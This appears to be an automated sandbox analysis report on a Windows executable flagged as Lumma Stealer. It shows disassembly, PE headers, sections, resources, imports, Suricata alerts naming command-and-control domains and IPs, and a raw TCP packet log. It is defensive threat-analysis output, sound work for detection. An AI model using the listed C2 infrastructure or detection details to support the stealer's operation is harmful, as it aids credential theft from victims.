                                                                                                                                                                                                                                                                                    mov dword ptr [00456C0Ch], ebx
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C08h], esi
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C04h], edi
                                                                                                                                                                                                                                                                                    mov word ptr [00456C30h], ss
                                                                                                                                                                                                                                                                                    mov word ptr [00456C24h], cs
                                                                                                                                                                                                                                                                                    mov word ptr [00456C00h], ds
                                                                                                                                                                                                                                                                                    mov word ptr [00456BFCh], es
                                                                                                                                                                                                                                                                                    mov word ptr [00456BF8h], fs
                                                                                                                                                                                                                                                                                    mov word ptr [00456BF4h], gs
                                                                                                                                                                                                                                                                                    pushfd
                                                                                                                                                                                                                                                                                    pop dword ptr [00456C28h]
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C1Ch], eax
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C20h], eax
                                                                                                                                                                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C2Ch], eax
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                                    mov dword ptr [00456B68h], 00010001h
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [00456C20h]
                                                                                                                                                                                                                                                                                    mov dword ptr [00456B1Ch], eax
                                                                                                                                                                                                                                                                                    mov dword ptr [00456B10h], C0000409h
                                                                                                                                                                                                                                                                                    mov dword ptr [00456B14h], 00000001h
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                                                                    mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                                                                    mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                                    call dword ptr [000000BCh]

                                                                                                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                                    • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x529cc0x50.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000xf5c8.rsrc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x525280x40.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x510000x188.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                    .text0x10000x4fcec0x4fe00d7b4f388686a04f4e1db9e5dd989e109False0.8437683392018779data7.54486526059017IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .rdata0x510000x22ac0x2400460d4ff88dad49b5a7b2cf269921cc36False0.3567708333333333data5.4011572557971395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .data0x540000x3dc49c0x70001d864f8258ab93d04bb8a110ce6f1f4funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .rsrc0x4310000xf5c80xf60014791c198544a3fe070ceb9243afd022False0.5639132367886179data5.472691619863669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                    RT_CURSOR0x43c0c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                                                    RT_ICON0x4316100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5189232409381663
                                                                                                                                                                                                                                                                                    RT_ICON0x4324b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5717509025270758
                                                                                                                                                                                                                                                                                    RT_ICON0x432d600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6105990783410138
                                                                                                                                                                                                                                                                                    RT_ICON0x4334280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6502890173410405
                                                                                                                                                                                                                                                                                    RT_ICON0x4339900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.42147302904564315
                                                                                                                                                                                                                                                                                    RT_ICON0x435f380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4910881801125704
                                                                                                                                                                                                                                                                                    RT_ICON0x436fe00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.48565573770491804
                                                                                                                                                                                                                                                                                    RT_ICON0x4379680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5957446808510638
                                                                                                                                                                                                                                                                                    RT_ICON0x437e480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.820362473347548
                                                                                                                                                                                                                                                                                    RT_ICON0x438cf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8569494584837545
                                                                                                                                                                                                                                                                                    RT_ICON0x4395980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7966589861751152
                                                                                                                                                                                                                                                                                    RT_ICON0x439c600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.8786127167630058
                                                                                                                                                                                                                                                                                    RT_ICON0x43a1c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8337242026266416
                                                                                                                                                                                                                                                                                    RT_ICON0x43b2700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8454918032786886
                                                                                                                                                                                                                                                                                    RT_ICON0x43bbf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8643617021276596
                                                                                                                                                                                                                                                                                    RT_STRING0x43d1400x4fedata0.43661971830985913
                                                                                                                                                                                                                                                                                    RT_STRING0x43d6400x66data0.6862745098039216
                                                                                                                                                                                                                                                                                    RT_STRING0x43d6a80x776data0.42670157068062825
                                                                                                                                                                                                                                                                                    RT_STRING0x43de200x54cdata0.4476401179941003
                                                                                                                                                                                                                                                                                    RT_STRING0x43e3700x7e0data0.42162698412698413
                                                                                                                                                                                                                                                                                    RT_STRING0x43eb500x6dadata0.4298745724059293
                                                                                                                                                                                                                                                                                    RT_STRING0x43f2300x756data0.422790202342918
                                                                                                                                                                                                                                                                                    RT_STRING0x43f9880x63cdata0.43796992481203006
                                                                                                                                                                                                                                                                                    RT_STRING0x43ffc80x5fadata0.43790849673202614
                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x43cf700x14data1.25
                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x43c0600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x437dd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                                                    RT_VERSION0x43cf880x1b4data0.5711009174311926

                                                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                    KERNEL32.dllSetDefaultCommConfigA, SetLocaleInfoA, GetNumaProcessorNode, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, DeleteVolumeMountPointW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, UnregisterWait, BuildCommDCBW, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, WriteConsoleOutputAttribute, OpenFileMappingA, WriteProcessMemory, SetFileAttributesA, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                                                    USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                                                    GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                    TurkmenTurkmenistan

                                                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:23.689288+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849705104.21.56.70443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:25.258834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706176.113.115.1980TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:29.679458+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.8505831.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:29.821766+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.8507411.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:31.198097+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.849707172.67.207.38443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:31.198097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.207.38443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:31.911159+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849707172.67.207.38443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:31.911159+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.207.38443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:31.916295+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.8523211.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:33.274722+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.849708104.21.16.1443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:33.274722+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.16.1443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.267261+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849708104.21.16.1443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.267261+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849708104.21.16.1443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.296521+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.8545711.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.441300+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.8518691.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.582731+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.8560231.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.727477+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.8495711.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:34.868837+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.8508551.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:35.009441+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.8592451.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:36.684902+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84971123.55.153.106443TCP
                                                                                                                                                                                                                                                                                    2024-12-15T09:20:37.462041+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84971123.55.153.106443TCP

                                                                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.834172964 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.834222078 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.834314108 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.845436096 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.845454931 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.066962957 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.067035913 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.134021997 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.134052038 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.134404898 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.134464025 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.138425112 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.179339886 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.689284086 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.689389944 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.689623117 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.698709011 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.698736906 CET44349705104.21.56.70192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.698745966 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.699466944 CET49705443192.168.2.8104.21.56.70
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.812845945 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.932523966 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.933331966 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.933777094 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:24.053442001 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258672953 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258775949 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258833885 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258833885 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258866072 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258917093 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258946896 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258984089 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259010077 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259033918 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259063005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259114981 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259154081 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259190083 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259203911 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259227037 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259234905 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259279013 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259388924 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259440899 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378681898 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378761053 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378806114 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378806114 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.382901907 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.382957935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451277971 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451351881 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451355934 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.451416969 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455379963 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455440998 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455517054 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.455569029 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463836908 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463893890 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463898897 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.463953018 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472207069 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472264051 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472270012 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.472371101 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480640888 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480720043 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480801105 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.480850935 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489309072 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489365101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489373922 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.489419937 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497518063 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497554064 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497575998 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.497607946 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.505965948 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506026983 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506036997 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.506086111 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514481068 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514554024 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514575005 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.514638901 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522792101 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522875071 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522937059 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.522994995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530438900 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530487061 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530509949 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.530549049 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658595085 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658658028 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658664942 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.658720016 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.660917997 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.660967112 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.661092043 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.661150932 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665587902 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665641069 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665731907 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.665782928 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670281887 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670339108 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670377970 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.670435905 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.674952030 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675005913 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675057888 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.675101995 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679626942 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679678917 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679729939 CET8049706176.113.115.19192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.679775953 CET4970680192.168.2.8176.113.115.19
